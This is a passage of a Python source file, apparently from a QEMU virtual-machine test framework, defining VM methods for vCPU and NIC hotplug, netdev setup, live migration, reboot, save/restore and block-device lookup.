:return: the list of vcpu PIDs
"""
return [int(_) for _ in re.findall(vcpu_thread_pattern,
str(self.monitor.info("cpus")))]
def get_vhost_threads(self, vhost_thread_pattern):
"""
Return the list of vhost threads PIDs
:param vhost_thread_pattern: a regex to match the vhost threads
:type vhost_thread_pattern: string
:return: a list of vhost threads PIDs
:rtype: builtin.list
"""
return [int(_) for _ in re.findall(vhost_thread_pattern %
self.get_pid(),
process.system_output("ps aux",
verbose=False))]
def get_shared_meminfo(self):
"""
Returns the VM's shared memory information.
:return: Shared memory used by VM (MB)
"""
if self.is_dead():
logging.error("Could not get shared memory info from dead VM.")
return None
filename = "/proc/%d/statm" % self.get_pid()
shm = int(open(filename).read().split()[2])
# statm reports sizes in pages; translate to MB assuming 4 KB pages
return shm * 4.0 / 1024
def get_spice_var(self, spice_var):
"""
Returns the string value of the requested spice variable, or None.
:param spice_var: spice related variable, e.g. 'spice_port'
"""
return self.spice_options.get(spice_var, None)
@error_context.context_aware
def hotplug_vcpu(self, cpu_id=None, plug_command=""):
"""
Hotplug a vcpu. If cpu_id is not assigned, the minimum unused id
is used. The function uses plug_command if you assigned one; else
the command is generated automatically based on the monitor type.
:param cpu_id: the id of the vcpu to hotplug.
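Example::

    # Illustrative: plug the next unused vcpu id and check result
    ok, data = vm.hotplug_vcpu()
    if not ok:
        raise exceptions.TestFail("vcpu hotplug failed: %s" % data)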
"""
vcpu_threads_count = len(self.vcpu_threads)
plug_cpu_id = cpu_id
if plug_cpu_id is None:
plug_cpu_id = vcpu_threads_count
if plug_command:
vcpu_add_cmd = plug_command % plug_cpu_id
else:
if self.monitor.protocol == 'human':
vcpu_add_cmd = "cpu_set %s online" % plug_cpu_id
elif self.monitor.protocol == 'qmp':
vcpu_add_cmd = "cpu-add id=%s" % plug_cpu_id
try:
self.monitor.verify_supported_cmd(vcpu_add_cmd.split()[0])
except qemu_monitor.MonitorNotSupportedCmdError:
raise exceptions.TestSkipError("%s monitor not support cmd '%s'" %
(self.monitor.protocol,
vcpu_add_cmd))
try:
cmd_output = self.monitor.send_args_cmd(vcpu_add_cmd)
except qemu_monitor.QMPCmdError, e:
return (False, str(e))
vcpu_thread_pattern = self.params.get("vcpu_thread_pattern",
r"thread_id.?[:|=]\s*(\d+)")
self.vcpu_threads = self.get_vcpu_pids(vcpu_thread_pattern)
if len(self.vcpu_threads) == vcpu_threads_count + 1:
return(True, plug_cpu_id)
else:
return(False, cmd_output)
@error_context.context_aware
def hotplug_nic(self, **params):
"""
Convenience method wrapper for add_nic() and add_netdev().
:return: dict-like object containing nic's details
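Example::

    # Illustrative: hotplug a virtio NIC and inspect its details
    nic = vm.hotplug_nic(nic_model="virtio-net-pci",
                         nic_name="hotnic")
    logging.info("hotplugged nic mac: %s", nic["mac"])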
"""
nic_name = self.add_nic(**params)["nic_name"]
self.activate_netdev(nic_name)
self.activate_nic(nic_name)
return self.virtnet[nic_name]
@error_context.context_aware
def hotunplug_nic(self, nic_index_or_name):
"""
Convenience method wrapper for del/deactivate nic and netdev.
"""
# make sure we got a name
nic_name = self.virtnet[nic_index_or_name].nic_name
self.deactivate_nic(nic_name)
self.deactivate_netdev(nic_name)
self.del_nic(nic_name)
@error_context.context_aware
def add_netdev(self, **params):
"""
Hotplug a netdev device.
:param params: NIC info dict.
:return: netdev_id
"""
nic_name = params['nic_name']
nic = self.virtnet[nic_name]
nic_index = self.virtnet.nic_name_index(nic_name)
nic.set_if_none('netdev_id', utils_misc.generate_random_id())
nic.set_if_none('ifname', self.virtnet.generate_ifname(nic_index))
nic.set_if_none('netdev_extra_params',
params.get('netdev_extra_params'))
nic.set_if_none('nettype', 'bridge')
if nic.nettype in ['bridge', 'macvtap']: # implies tap
# destination is required, hard-code reasonable default if unset
# nic.set_if_none('netdst', 'virbr0')
# tapfd allocated/set in activate because requires system resources
nic.set_if_none('queues', '1')
ids = []
for i in range(int(nic.queues)):
ids.append(utils_misc.generate_random_id())
nic.set_if_none('tapfd_ids', ids)
elif nic.nettype == 'user':
pass # nothing to do
else: # unsupported nettype
raise virt_vm.VMUnknownNetTypeError(self.name, nic_name,
nic.nettype)
return nic.netdev_id
@error_context.context_aware
def del_netdev(self, nic_index_or_name):
"""
Remove netdev info from a nic on the VM; does not deactivate it.
:param nic_index_or_name: name or index number for existing NIC
"""
nic = self.virtnet[nic_index_or_name]
error_context.context("removing netdev info from nic %s from vm %s" % (
nic, self.name))
for prop in ['netdev_id', 'ifname', 'queues',
'tapfds', 'tapfd_ids', 'vectors']:
if prop in nic:
del nic[prop]
def add_nic(self, **params):
"""
Add a new NIC or set up an existing one, creating a netdev if unset
:param params: Parameters to set
:param nic_name: Name for existing or new device
:param nic_model: Model name to emulate
:param netdev_id: Existing qemu net device ID name, None to create new
:param mac: Optional MAC address, None to randomly generate.
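Example::

    # Illustrative: define an e1000 NIC (not activated yet)
    nic = vm.add_nic(nic_name="nic2", nic_model="e1000")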
"""
# returns existing or new nic object
nic = super(VM, self).add_nic(**params)
nic_index = self.virtnet.nic_name_index(nic.nic_name)
nic.set_if_none('vlan', str(nic_index))
nic.set_if_none('device_id', utils_misc.generate_random_id())
nic.set_if_none('queues', '1')
if 'netdev_id' not in nic:
# virtnet items are lists that act like dicts
nic.netdev_id = self.add_netdev(**dict(nic))
nic.set_if_none('nic_model', params['nic_model'])
nic.set_if_none('queues', params.get('queues', '1'))
if params.get("enable_msix_vectors") == "yes":
nic.set_if_none('vectors', 2 * int(nic.queues) + 2)
return nic
@error_context.context_aware
def activate_netdev(self, nic_index_or_name):
"""
Activate an inactive host-side networking device
:raise: IndexError if nic doesn't exist
:raise: VMUnknownNetTypeError: if nettype is unset/unsupported
:raise: IOError if TAP device node cannot be opened
:raise: VMAddNetDevError: if operation failed
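Example::

    # Illustrative hotplug order for a NIC added with add_nic():
    vm.add_nic(nic_name="nic2", nic_model="virtio-net-pci")
    vm.activate_netdev("nic2")
    vm.activate_nic("nic2")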
"""
nic = self.virtnet[nic_index_or_name]
error_context.context("Activating netdev for %s based on %s" %
(self.name, nic))
msg_sfx = ("nic %s on vm %s with attach_cmd " %
(self.virtnet[nic_index_or_name], self.name))
attach_cmd = "netdev_add"
if nic.nettype in ['bridge', 'macvtap']:
error_context.context("Opening tap device node for %s " % nic.ifname,
logging.debug)
if nic.nettype == "bridge":
tun_tap_dev = "/dev/net/tun"
python_tapfds = utils_net.open_tap(tun_tap_dev,
nic.ifname,
queues=nic.queues,
vnet_hdr=False)
elif nic.nettype == "macvtap":
macvtap_mode = self.params.get("macvtap_mode", "vepa")
o_macvtap = utils_net.create_macvtap(nic.ifname, macvtap_mode,
nic.netdst, nic.mac)
tun_tap_dev = o_macvtap.get_device()
python_tapfds = utils_net.open_macvtap(o_macvtap, nic.queues)
qemu_fds = "/proc/%s/fd" % self.get_pid()
openfd_list = os.listdir(qemu_fds)
for i in range(int(nic.queues)):
error_context.context("Assigning tap %s to qemu by fd" %
nic.tapfd_ids[i], logging.info)
self.monitor.getfd(int(python_tapfds.split(':')[i]),
nic.tapfd_ids[i])
n_openfd_list = os.listdir(qemu_fds)
new_fds = list(set(n_openfd_list) - set(openfd_list))
if not new_fds:
err_msg = "Can't get the fd that qemu process opened!"
raise virt_vm.VMAddNetDevError(err_msg)
qemu_tapfds = [fd for fd in new_fds if os.readlink(
os.path.join(qemu_fds, fd)) == tun_tap_dev]
if not qemu_tapfds or len(qemu_tapfds) != int(nic.queues):
err_msg = "Can't get the tap fd in qemu process!"
raise virt_vm.VMAddNetDevError(err_msg)
nic.set_if_none("tapfds", ":".join(qemu_tapfds))
if not self.devices:
err_msg = "Can't add nic for VM which is not running."
raise virt_vm.VMAddNetDevError(err_msg)
if ((int(nic.queues)) > 1 and
',fds=' in self.devices.get_help_text()):
attach_cmd += " type=tap,id=%s,fds=%s" % (nic.device_id,
nic.tapfds)
else:
attach_cmd += " type=tap,id=%s,fd=%s" % (nic.device_id,
nic.tapfds)
error_context.context("Raising interface for " + msg_sfx + attach_cmd,
logging.debug)
utils_net.bring_up_ifname(nic.ifname)
# assume this will puke if netdst unset
if nic.netdst is not None and nic.nettype == "bridge":
error_context.context("Raising bridge for " + msg_sfx + attach_cmd,
logging.debug)
utils_net.add_to_bridge(nic.ifname, nic.netdst)
elif nic.nettype == 'user':
attach_cmd += " user,id=%s" % nic.device_id
elif nic.nettype == 'none':
attach_cmd += " none"
else: # unsupported nettype
raise virt_vm.VMUnknownNetTypeError(self.name, nic_index_or_name,
nic.nettype)
if 'netdev_extra_params' in nic and nic.netdev_extra_params:
attach_cmd += nic.netdev_extra_params
error_context.context(
"Hotplugging " +
msg_sfx +
attach_cmd,
logging.debug)
if self.monitor.protocol == 'qmp':
self.monitor.send_args_cmd(attach_cmd)
else:
self.monitor.send_args_cmd(attach_cmd, convert=False)
network_info = self.monitor.info("network")
if nic.device_id not in network_info:
# Don't leave resources dangling
self.deactivate_netdev(nic_index_or_name)
raise virt_vm.VMAddNetDevError(("Failed to add netdev: %s for " %
nic.device_id) + msg_sfx +
attach_cmd)
@error_context.context_aware
def activate_nic(self, nic_index_or_name):
"""
Activate a VM's inactive NIC device and verify its state
:param nic_index_or_name: name or index number for existing NIC
"""
error_context.context("Retrieving info for NIC %s on VM %s" % (
nic_index_or_name, self.name))
nic = self.virtnet[nic_index_or_name]
device_add_cmd = "device_add"
if 'nic_model' in nic:
device_add_cmd += ' driver=%s' % nic.nic_model
device_add_cmd += ",netdev=%s" % nic.device_id
if 'mac' in nic:
device_add_cmd += ",mac=%s" % nic.mac
device_add_cmd += ",id=%s" % nic.nic_name
if nic['nic_model'] == 'virtio-net-pci':
if int(nic['queues']) > 1:
device_add_cmd += ",mq=on"
if 'vectors' in nic:
device_add_cmd += ",vectors=%s" % nic.vectors
device_add_cmd += nic.get('nic_extra_params', '')
if 'romfile' in nic:
device_add_cmd += ",romfile=%s" % nic.romfile
error_context.context("Activating nic on VM %s with monitor command %s" % (
self.name, device_add_cmd))
if self.monitor.protocol == 'qmp':
self.monitor.send_args_cmd(device_add_cmd)
else:
self.monitor.send_args_cmd(device_add_cmd, convert=False)
error_context.context("Verifying nic %s shows in qtree" % nic.nic_name)
qtree = self.monitor.info("qtree")
if nic.nic_name not in qtree:
logging.error(qtree)
raise virt_vm.VMAddNicError("Device %s was not plugged into qdev"
"tree" % nic.nic_name)
@error_context.context_aware
def deactivate_nic(self, nic_index_or_name, wait=20):
"""
Reverses what activate_nic did
:param nic_index_or_name: name or index number for existing NIC
:param wait: Time the test will wait for the guest to unplug the device
"""
nic = self.virtnet[nic_index_or_name]
error_context.context("Removing nic %s from VM %s" %
(nic_index_or_name, self.name))
nic_del_cmd = "device_del id=%s" % (nic.nic_name)
if self.monitor.protocol == 'qmp':
self.monitor.send_args_cmd(nic_del_cmd)
else:
self.monitor.send_args_cmd(nic_del_cmd, convert=True)
if wait:
logging.info("waiting for the guest to finish the unplug")
nic_eigenvalue = r'dev:\s+%s,\s+id\s+"%s"' % (nic.nic_model,
nic.nic_name)
if not utils_misc.wait_for(lambda: nic_eigenvalue not in
self.monitor.info("qtree"),
wait, 5, 1):
raise virt_vm.VMDelNicError("Device is not unplugged by "
"guest, please check whether the "
"hotplug module was loaded in "
"guest")
@error_context.context_aware
def deactivate_netdev(self, nic_index_or_name):
"""
Reverses what activate_netdev() did
:param nic_index_or_name: name or index number for existing NIC
"""
# FIXME: Need to down interface & remove from bridge????
nic = self.virtnet[nic_index_or_name]
netdev_id = nic.device_id
error_context.context("removing netdev id %s from vm %s" %
(netdev_id, self.name))
nic_del_cmd = "netdev_del id=%s" % netdev_id
if self.monitor.protocol == 'qmp':
self.monitor.send_args_cmd(nic_del_cmd)
else:
self.monitor.send_args_cmd(nic_del_cmd, convert=True)
network_info = self.monitor.info("network")
netdev_eigenvalue = r'netdev\s+=\s+%s' % netdev_id
if netdev_eigenvalue in network_info:
raise virt_vm.VMDelNetDevError("Fail to remove netdev %s" %
netdev_id)
if nic.nettype == 'macvtap':
tap = utils_net.Macvtap(nic.ifname)
tap.delete()
@error_context.context_aware
def del_nic(self, nic_index_or_name):
"""
Undefine nic parameters, reverses what add_nic did.
:param nic_index_or_name: name or index number for existing NIC
"""
super(VM, self).del_nic(nic_index_or_name)
@error_context.context_aware
def send_fd(self, fd, fd_name="migfd"):
"""
Send a file descriptor over a unix socket to the VM.
:param fd: File descriptor.
:param fd_name: File descriptor identifier in the VM.
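Example::

    # Illustrative: hand the write end of a pipe to the source VM
    # for fd-based migration
    read_fd, write_fd = os.pipe()
    vm.send_fd(write_fd, "migfd_example")
    os.close(write_fd)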
"""
error_context.context(
"Send fd %d like %s to VM %s" %
(fd, fd_name, self.name))
logging.debug("Send file descriptor %s to source VM.", fd_name)
if self.monitor.protocol == 'human':
self.monitor.cmd("getfd %s" % (fd_name), fd=fd)
elif self.monitor.protocol == 'qmp':
self.monitor.cmd("getfd", args={'fdname': fd_name}, fd=fd)
error_context.context()
def mig_finished(self):
ret = True
if (self.params["display"] == "spice" and
self.get_spice_var("spice_seamless_migration") == "on"):
s = self.monitor.info("spice")
if isinstance(s, str):
ret = len(re.findall("migrated: true", s, re.I)) > 0
else:
ret = len(re.findall("true", str(s.get("migrated")), re.I)) > 0
o = self.monitor.info("migrate")
if isinstance(o, str):
return ret and ("status: active" not in o)
else:
return ret and (o.get("status") != "active")
def mig_succeeded(self):
o = self.monitor.info("migrate")
if isinstance(o, str):
return "status: completed" in o
else:
return o.get("status") == "completed"
def mig_failed(self):
o = self.monitor.info("migrate")
if isinstance(o, str):
return "status: failed" in o
else:
return o.get("status") == "failed"
def mig_cancelled(self):
if self.mig_succeeded():
raise virt_vm.VMMigrateCancelError(
"Migration completed successfully")
elif self.mig_failed():
raise virt_vm.VMMigrateFailedError("Migration failed")
o = self.monitor.info("migrate")
if isinstance(o, str):
return ("Migration status: cancelled" in o or
"Migration status: canceled" in o)
else:
return (o.get("status") == "cancelled" or
o.get("status") == "canceled")
def wait_for_migration(self, timeout):
if not utils_misc.wait_for(self.mig_finished, timeout, 2, 2,
"Waiting for migration to complete"):
raise virt_vm.VMMigrateTimeoutError("Timeout expired while waiting"
" for migration to finish")
@error_context.context_aware
def migrate(self, timeout=virt_vm.BaseVM.MIGRATE_TIMEOUT, protocol="tcp",
cancel_delay=None, offline=False, stable_check=False,
clean=True, save_path=data_dir.get_tmp_dir(),
dest_host="localhost",
remote_port=None, not_wait_for_migration=False,
fd_src=None, fd_dst=None, migration_exec_cmd_src=None,
migration_exec_cmd_dst=None, env=None,
migrate_capabilities=None):
"""
Migrate the VM.
If the migration is local, the VM object's state is switched with that
of the destination VM. Otherwise, the state is switched with that of
a dead VM (returned by self.clone()).
:param timeout: Time to wait for migration to complete.
:param protocol: Migration protocol (as defined in MIGRATION_PROTOS)
:param cancel_delay: If provided, specifies a time duration after which
migration will be canceled. Used for testing migrate_cancel.
:param offline: If True, pause the source VM before migration.
:param stable_check: If True, compare the VM's state after migration to
its state before migration and raise an exception if they
differ.
:param clean: If True, delete the saved state files (relevant only if
stable_check is also True).
:param save_path: The path for state files.
:param dest_host: Destination host (defaults to 'localhost').
:param remote_port: Port to use for remote migration.
:param not_wait_for_migration: If True, start the migration but do
not wait until it finishes.
:param fd_src: File descriptor for migration to which the source
VM writes data. The descriptor is closed during the migration.
:param fd_dst: File descriptor for migration from which the
destination VM reads data.
:param migration_exec_cmd_src: Command to embed in the source's
'migrate "exec: ..."' (e.g. 'gzip -c > filename') if protocol
is 'exec'; defaults to piping through 'nc' on a random TCP port
:param migration_exec_cmd_dst: Command to embed in '-incoming "exec: ..."'
(e.g. 'gzip -c -d filename') if protocol is 'exec'; defaults to
listening on a random TCP port
:param env: Dictionary with the test environment
:param migrate_capabilities: Migration capabilities to set, given
as a dict mapping capability name to "on"/"off".
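Example::

    # Illustrative: local live migration over a unix socket
    vm.migrate(protocol="unix")
    # or via an external command (hypothetical path shown):
    vm.migrate(protocol="exec",
               migration_exec_cmd_src="gzip -c > /tmp/mig.gz",
               migration_exec_cmd_dst="gzip -c -d /tmp/mig.gz")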
"""
if protocol not in self.MIGRATION_PROTOS:
raise virt_vm.VMMigrateProtoUnknownError(protocol)
error_context.base_context("migrating '%s'" % self.name)
local = dest_host == "localhost"
mig_fd_name = None
if protocol == "fd":
# Check if descriptors aren't None for local migration.
if local and (fd_dst is None or fd_src is None):
(fd_dst, fd_src) = os.pipe()
mig_fd_name = "migfd_%d_%d" % (fd_src, time.time())
self.send_fd(fd_src, mig_fd_name)
os.close(fd_src)
clone = self.clone()
if self.params.get('qemu_dst_binary', None) is not None:
clone.params[
'qemu_binary'] = utils_misc.get_qemu_dst_binary(self.params)
if env:
env.register_vm("%s_clone" % clone.name, clone)
if (local and not (migration_exec_cmd_src and
"gzip" in migration_exec_cmd_src)):
error_context.context("creating destination VM")
if stable_check:
# Pause the dest vm after creation
extra_params = clone.params.get("extra_params", "") + " -S"
clone.params["extra_params"] = extra_params
clone.create(migration_mode=protocol, mac_source=self,
migration_fd=fd_dst,
migration_exec_cmd=migration_exec_cmd_dst)
if fd_dst:
os.close(fd_dst)
error_context.context()
try:
if (self.params["display"] == "spice" and local and
not (protocol == "exec" and
(migration_exec_cmd_src and "gzip" in migration_exec_cmd_src))):
host_ip = utils_net.get_host_ip_address(self.params)
dest_port = clone.spice_options.get('spice_port', '')
if self.params.get("spice_ssl") == "yes":
dest_tls_port = clone.spice_options.get("spice_tls_port",
"")
cert_s = clone.spice_options.get("spice_x509_server_subj",
"")
cert_subj = "%s" % cert_s[1:]
cert_subj += host_ip
cert_subj = "\"%s\"" % cert_subj
else:
dest_tls_port = ""
cert_subj = ""
logging.debug("Informing migration to spice client")
commands = ["__com.redhat_spice_migrate_info",
"spice_migrate_info",
"client_migrate_info"]
cmdline = ""
for command in commands:
try:
self.monitor.verify_supported_cmd(command)
except qemu_monitor.MonitorNotSupportedCmdError:
continue
# spice_migrate_info requires host_ip, dest_port
# client_migrate_info also requires protocol
cmdline = "%s " % (command)
if command == "client_migrate_info":
cmdline += " protocol=%s," % self.params['display']
cmdline += " hostname=%s" % (host_ip)
if dest_port:
cmdline += ",port=%s" % dest_port
if dest_tls_port:
cmdline += ",tls-port=%s" % dest_tls_port
if cert_subj:
cmdline += ",cert-subject=%s" % cert_subj
break
if cmdline:
self.monitor.send_args_cmd(cmdline)
if protocol in ["tcp", "rdma", "x-rdma"]:
if local:
uri = protocol + ":localhost:%d" % clone.migration_port
else:
uri = protocol + ":%s:%d" % (dest_host, remote_port)
elif protocol == "unix":
uri = "unix:%s" % clone.migration_file
elif protocol == "exec":
if local:
if not migration_exec_cmd_src:
uri = '"exec:nc localhost %s"' % clone.migration_port
else:
uri = '"exec:%s"' % (migration_exec_cmd_src)
else:
uri = '"exec:%s"' % (migration_exec_cmd_src)
elif protocol == "fd":
uri = "fd:%s" % mig_fd_name
if offline is True:
self.monitor.cmd("stop")
if migrate_capabilities:
error_context.context(
"Set migrate capabilities.", logging.info)
for key, value in migrate_capabilities.items():
state = value == "on"
self.monitor.set_migrate_capability(state, key)
s = self.monitor.get_migrate_capability(key)
if s != state:
msg = ("Migrate capability '%s' should be '%s', "
"but actual result is '%s'" % (key, state, s))
raise exceptions.TestError(msg)
threads_before_migrate = self.get_qemu_threads()
logging.info("Migrating to %s", uri)
self.monitor.migrate(uri)
if not_wait_for_migration:
return clone
if self.params.get("enable_check_mig_thread", "no") == "yes":
threads_during_migrate = self.get_qemu_threads()
if not (len(threads_during_migrate) >
len(threads_before_migrate)):
raise virt_vm.VMMigrateFailedError("Cannot find new thread"
" for migration.")
if cancel_delay:
error_context.context("Do migrate_cancel after %d seconds" %
cancel_delay, logging.info)
time.sleep(cancel_delay)
self.monitor.cmd("migrate_cancel")
if not utils_misc.wait_for(self.mig_cancelled, 60, 2, 2,
"Waiting for migration "
"cancellation"):
raise virt_vm.VMMigrateCancelError(
"Cannot cancel migration")
return
self.wait_for_migration(timeout)
if (local and (migration_exec_cmd_src and
"gzip" in migration_exec_cmd_src)):
error_context.context("creating destination VM")
if stable_check:
# Pause the dest vm after creation
extra_params = clone.params.get("extra_params", "") + " -S"
clone.params["extra_params"] = extra_params
clone.create(migration_mode=protocol, mac_source=self,
migration_fd=fd_dst,
migration_exec_cmd=migration_exec_cmd_dst)
self.verify_alive()
# Report migration status
if self.mig_succeeded():
logging.info("Migration completed successfully")
elif self.mig_failed():
raise virt_vm.VMMigrateFailedError("Migration failed")
else:
raise virt_vm.VMMigrateFailedError("Migration ended with "
"unknown status")
# Switch self <-> clone
temp = self.clone(copy_state=True)
self.__dict__ = clone.__dict__
clone = temp
# From now on, clone is the source VM that will soon be destroyed
# and self is the destination VM that will remain alive. If this
# is remote migration, self is a dead VM object.
error_context.context("after migration")
if local:
time.sleep(1)
self.verify_alive()
if local and stable_check:
try:
save1 = os.path.join(save_path, "src-" + clone.instance)
save2 = os.path.join(save_path, "dst-" + self.instance)
clone.save_to_file(save1)
self.save_to_file(save2)
# Fail if we see deltas
md5_save1 = crypto.hash_file(save1)
md5_save2 = crypto.hash_file(save2)
if md5_save1 != md5_save2:
raise virt_vm.VMMigrateStateMismatchError()
finally:
if clean:
if os.path.isfile(save1):
os.remove(save1)
if os.path.isfile(save2):
os.remove(save2)
finally:
# If we're doing remote migration and it's completed successfully,
# self points to a dead VM object
if not not_wait_for_migration:
if self.is_alive():
self.monitor.cmd("cont")
clone.destroy(gracefully=False)
if env:
env.unregister_vm("%s_clone" % self.name)
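    # Usage sketch (editor's note, illustrative only): with `vm` being a
    # running instance of this class, a plain local TCP migration that is
    # given five minutes to converge might look like:
    #
    #     vm.migrate(timeout=300, protocol="tcp")
    #
    # After a successful local migration the object swap above makes `vm`
    # refer to the destination, so existing references keep working.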
@error_context.context_aware
def reboot(self, session=None, method="shell", nic_index=0,
timeout=virt_vm.BaseVM.REBOOT_TIMEOUT, serial=False):
"""
Reboot the VM and wait for it to come back up by trying to log in until
timeout expires.
:param session: A shell session object or None.
:param method: Reboot method. Can be "shell" (send a shell reboot
command) or "system_reset" (send a system_reset monitor command).
:param nic_index: Index of NIC to access in the VM, when logging in
after rebooting.
:param timeout: Time to wait for login to succeed (after rebooting).
:param serial: Serial login or not (default is False).
:return: A new shell session object.
"""
def __get_session(nic_index=0, serial=False):
"""
Get connection to VM
"""
if serial:
return self.serial_login()
return self.login(nic_index=nic_index)
def __go_down(session, nic_index, serial):
"""
Check guest rebooting.
"""
timeout = self.CLOSE_SESSION_TIMEOUT
try:
if serial:
patterns = [r".*[Rr]ebooting.*", r".*[Rr]estarting system.*",
r".*[Mm]achine restart.*", r".*Linux version.*"]
if session.read_until_any_line_matches(
patterns, timeout=timeout):
session.close()
return True
else:
session = __get_session(nic_index, serial)
session.close()
return False
except (remote.LoginError, aexpect.ShellError):
return True
return False
def wait_for_go_down(session, nic_index, serial, timeout):
""" Wait for VM go down
:param session: VM session object
:param nic_index: which nic what to login VM
:param serial: login VM via serial console or not
:param timeout: timeout wait for VM go down
"""
if not utils_misc.wait_for(
lambda: __go_down(session, nic_index, serial),
timeout=timeout):
raise virt_vm.VMRebootError("Guest refuses to go down")
logging.info("VM go down, wait for it boot up")
def shell_reboot(session, nic_index, serial, timeout):
"""
            Reboot the guest OS via a shell command.
            :param session: VM session object
            :param nic_index: index of the NIC used to log into the VM
            :param serial: whether to log into the VM via the serial console
            :param timeout: time to wait for the VM to go down
"""
if not session or not session.is_responsive():
session = __get_session(nic_index=nic_index, serial=serial)
console = session.cmd("tty", ignore_all_errors=True)
serial = console and ("pts" not in console)
reboot_cmd = self.params.get("reboot_command")
step_info = "Send %s command, wait for VM rebooting" % reboot_cmd
error_context.context(step_info)
session.sendline(reboot_cmd)
wait_for_go_down(session, nic_index, serial, timeout=timeout)
error_context.base_context("rebooting '%s'" % self.name, logging.info)
error_context.context("before reboot")
error_context.context()
if method == "shell":
shell_reboot(session, nic_index, serial, timeout / 2)
elif method == "system_reset":
self.system_reset()
else:
raise virt_vm.VMRebootError("Unknown reboot method: %s" % method)
if self.params.get("mac_changeable") == "yes":
utils_net.update_mac_ip_address(self, self.params)
error_context.context("logging in after reboot", logging.info)
if serial:
return self.wait_for_serial_login(timeout=(timeout / 2))
return self.wait_for_login(nic_index=nic_index, timeout=(timeout / 2))
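    # Usage sketch (illustrative, not part of the original file): a
    # shell-driven reboot that returns a fresh session for further commands:
    #
    #     session = vm.reboot(method="shell", timeout=240)
    #     session.cmd("uname -r")
    #     session.close()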
def send_key(self, keystr):
"""
Send a key event to the VM.
:param keystr: A key event string (e.g. "ctrl-alt-delete")
"""
# For compatibility with versions of QEMU that do not recognize all
# key names: replace keyname with the hex value from the dict, which
# QEMU will definitely accept
key_mapping = {"semicolon": "0x27",
"comma": "0x33",
"dot": "0x34",
"slash": "0x35"}
for key, value in key_mapping.items():
keystr = keystr.replace(key, value)
self.monitor.sendkey(keystr)
time.sleep(0.2)
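    # Example (illustrative): the mapping above only rewrites the four listed
    # key names, so a combo like the following is passed through verbatim:
    #
    #     vm.send_key("ctrl-alt-delete")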
# should this really be expected from VMs of all hypervisor types?
def screendump(self, filename, debug=True):
try:
if self.catch_monitor:
self.catch_monitor.screendump(filename=filename, debug=debug)
        except qemu_monitor.MonitorError as e:
logging.warn(e)
def save_to_file(self, path):
"""
Override BaseVM save_to_file method
"""
self.verify_status('paused') # Throws exception if not
# Set high speed 1TB/S
self.monitor.migrate_set_speed(str(2 << 39))
self.monitor.migrate_set_downtime(self.MIGRATE_TIMEOUT)
logging.debug("Saving VM %s to %s" % (self.name, path))
# Can only check status if background migration
self.monitor.migrate("exec:cat>%s" % path, wait=False)
utils_misc.wait_for(
# no monitor.migrate-status method
lambda:
re.search("(status.*completed)",
str(self.monitor.info("migrate")), re.M),
self.MIGRATE_TIMEOUT, 2, 2,
"Waiting for save to %s to complete" % path)
# Restore the speed and downtime to default values
self.monitor.migrate_set_speed(str(32 << 20))
self.monitor.migrate_set_downtime(0.03)
# Base class defines VM must be off after a save
self.monitor.cmd("system_reset")
self.verify_status('paused') # Throws exception if not
def restore_from_file(self, path):
"""
Override BaseVM restore_from_file method
"""
self.verify_status('paused') # Throws exception if not
logging.debug("Restoring VM %s from %s" % (self.name, path))
# Rely on create() in incoming migration mode to do the 'right thing'
self.create(name=self.name, params=self.params, root_dir=self.root_dir,
timeout=self.MIGRATE_TIMEOUT, migration_mode="exec",
migration_exec_cmd="cat " + path, mac_source=self)
self.verify_status('running') # Throws exception if not
def savevm(self, tag_name):
"""
Override BaseVM savevm method
"""
self.verify_status('paused') # Throws exception if not
logging.debug("Saving VM %s to %s" % (self.name, tag_name))
self.monitor.send_args_cmd("savevm id=%s" % tag_name)
self.monitor.cmd("system_reset")
self.verify_status('paused') # Throws exception if not
def loadvm(self, tag_name):
"""
Override BaseVM loadvm method
"""
self.verify_status('paused') # Throws exception if not
logging.debug("Loading VM %s from %s" % (self.name, tag_name))
self.monitor.send_args_cmd("loadvm id=%s" % tag_name)
self.verify_status('paused') # Throws exception if not
def pause(self):
"""
Pause the VM operation.
"""
self.monitor.cmd("stop")
def resume(self):
"""
Resume the VM operation in case it's stopped.
"""
self.monitor.cmd("cont")
def set_link(self, netdev_name, up):
"""
Set link up/down.
        :param netdev_name: Name of the network device (netdev)
        :param up: Bool value, True=set this link up, False=set this link down
"""
self.monitor.set_link(netdev_name, up)
def get_block_old(self, blocks_info, p_dict={}):
"""
Get specified block device from monitor's info block command.
The block device is defined by parameter in p_dict.
:param p_dict: Dictionary that contains parameters and its value used
to define specified block device.
:param blocks_info: the results of monitor command 'info block'
        :return: Matched block device name, or None when no device matches.
"""
if isinstance(blocks_info, str):
for block in blocks_info.splitlines():
match = True
for key, value in p_dict.iteritems():
if value is True:
check_str = "%s=1" % key
elif value is False:
check_str = "%s=0" % key
else:
check_str = "%s=%s" % (key, value)
if check_str not in block:
match = False
break
if match:
return block.split(":")[0]
else:
for block in blocks_info:
match = True
for key, value in p_dict.iteritems():
if isinstance(value, bool):
check_str = "u'%s': %s" % (key, value)
else:
check_str = "u'%s': u'%s'" % (key, value)
if check_str not in str(block):
match = False
break
if match:
return block['device']
return None
def process_info_block(self, blocks_info):
"""
        Process the 'info block' output so that both the new and the old
        qemu output formats can be handled.
        :param blocks_info: the output of the qemu monitor command
                            'info block'
        :return: list of block entries, one string per device
"""
block_list = []
block_entry = []
for block in blocks_info.splitlines():
if block:
block_entry.append(block.strip())
else:
block_list.append(' '.join(block_entry))
block_entry = []
# don't forget the last one
block_list.append(' '.join(block_entry))
return block_list
def get_block(self, p_dict={}):
"""
Get specified block device from monitor's info block command.
The block device is defined by parameter in p_dict.
:param p_dict: Dictionary that contains parameters and its value used
to define specified block device.
        :return: Matched block device name, or None when no device matches.
"""
blocks_info = self.monitor.info("block")
block = self.get_block_old(blocks_info, p_dict)
if block:
return block
block_list = self.process_info_block(blocks_info)
for block in block_list:
for key, value in p_dict.iteritems():
# for new qemu we just deal with key = [removable,
# file,backing_file], for other types key, we should
# fixup later
logging.info("block = %s" % block)
if key == 'removable':
if value is False:
if 'Removable device' not in block:
return block.split(":")[0]
elif value is True:
if 'Removable device' in block:
return block.split(":")[0]
# file in key means both file and backing_file
if ('file' in key) and (value in block):
return block.split(":")[0]
return None
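    # Example (hedged sketch; the image path is hypothetical): find the drive
    # backed by a given image, matching on 'file'/'backing_file' as above:
    #
    #     device = vm.get_block({"file": "/tmp/disk0.qcow2"})
    #     if device is None:
    #         raise RuntimeError("no drive found for the image")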
def check_block_locked(self, value):
"""
        Check whether the specified block device is locked.
        :param value: Parameter that identifies the block device.
                      Can be any possible identification of a device,
                      such as device name/image file name/...
        :return: True if the device is locked, False if it is unlocked.
"""
assert value, "Device identification not specified"
blocks_info = self.monitor.info("block")
assert value in str(blocks_info), \
